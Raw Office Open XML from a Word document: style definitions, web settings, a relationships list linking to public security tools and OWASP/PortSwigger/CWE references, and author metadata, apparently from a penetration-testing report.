    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BoxCode">
    <w:name w:val="Box Code"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="BoxCodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ImportantChar">
    <w:name w:val="Important Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="Important"/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C00000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BoxCodeChar">
    <w:name w:val="Box Code Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="BoxCode"/>
    <w:rsid w:val="003C21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2657">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="422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hyperlink" Target="https://www.kali.org/tools/smtp-user-enum/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sqlmap.org/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortinet.com/resources/cyberglossary/authentication-token#:~:text=What%20Is%20Token%2Dbased%20Authentication,a%20unique%20encrypted%20authentication%20token" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lc/gau" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OJ/gobuster" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ParrotSec/mimikatz"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nmap.org/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/crackmapexec/" TargetMode="External"/><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portswigger.net/web-security/os-command-injection#:~:text=OS%20command%20injection%20(also%20known,application%20and%20all%20its%20data" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.microsoft.com/office/2018/08/relationships/commentsExtensible" Target="commentsExtensible.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/256.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/vulnerabilities/FTP-GENERIC-0002/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sensepost/gowitness" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/theharvester/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploi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map.org/book/ns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15.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/xss/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/recon-ng/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://builtwith.com/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metasploit.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wasp.org/www-community/attacks/SQL_Injection" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/200.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ffuf/ffuf" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SpiderLabs/Responder" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/vulnerabilities/Password_Plaintext_Storage" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/robertdavidgraham/masscan" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sullo/nikto"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FAB-7DC8-4537-A911-C8FF1F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108</Words>
  <Characters>10322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Von Tish</dc:creator>
  <cp:lastModifiedBy>Lindsay Von Tish</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2023-03-11T02:28:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-02T03:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-02T03:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>